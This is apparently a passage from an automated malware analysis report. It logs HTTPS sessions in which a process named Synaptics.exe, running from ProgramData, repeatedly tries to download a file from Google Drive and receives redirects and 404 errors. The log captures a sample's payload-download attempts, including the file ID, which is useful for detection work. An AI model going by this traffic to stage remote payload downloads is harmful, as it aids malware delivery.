                                                                                                              X-GUploader-UploadID: AFiumC7izHuar7uQ206L-xu-k3mj8LBhLHAY1kar-yZIWx6R1SlJEKFkJn_hhdGnfvonz0ZK
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-JzbTiofveld_1weHm55m-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:33 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:33 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 6b 61 52 79 68 6e 34 5a 42 58 32 4f 78 4b 79 67 65 31 45 31 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="HkaRyhn4ZBX2OxKyge1E1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:33 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              39192.168.2.849780216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:33 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-5mLQNRjRC4G6BXudW4xm4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              40192.168.2.849781216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:33 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bfSXW1wV-AW8zLTad8A_UA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              41192.168.2.849784172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:34 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:34 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7NKv4K7uh9icV8beG1G-C0nFwY04baUCzwiBoS13FCyi8UCB8PbDnBdtxAPOuT7V39
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-czx8Jis7tppnJ0wUUfRY7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:34 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:34 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 35 59 62 30 38 46 79 68 6f 43 48 2d 53 6c 41 48 75 56 4a 62 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="L5Yb08FyhoCH-SlAHuVJbA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:34 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              42192.168.2.849787216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:34 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UBwZJ5ETgQax5yIgzMxIsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              43192.168.2.849788216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:34 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-esQfeSAsTcTY0cef746ctA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              44192.168.2.849789172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:34 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:35 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5zCl7tfIHxqfEFWxVOR4M0tSe-fW3xJufJFgxn7zqpNZc0CYz0GHNdt52jPby5ZSab
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UrFnLCUNUMUPFdmOfrpI3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:35 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:35 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 77 44 4c 31 72 30 42 7a 4b 52 44 4a 72 39 75 32 70 44 48 43 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="-wDL1r0BzKRDJr9u2pDHCA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:35 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              45192.168.2.849790172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:35 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:35 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6-rT-TxuIr7G52EyUoMbYVuNEAtr-kYpZic6RN6H6FhZxgh7jFVMPzJa9LNK0Q1vJg
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-lqiyxKo0SI86GbWsz8eq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
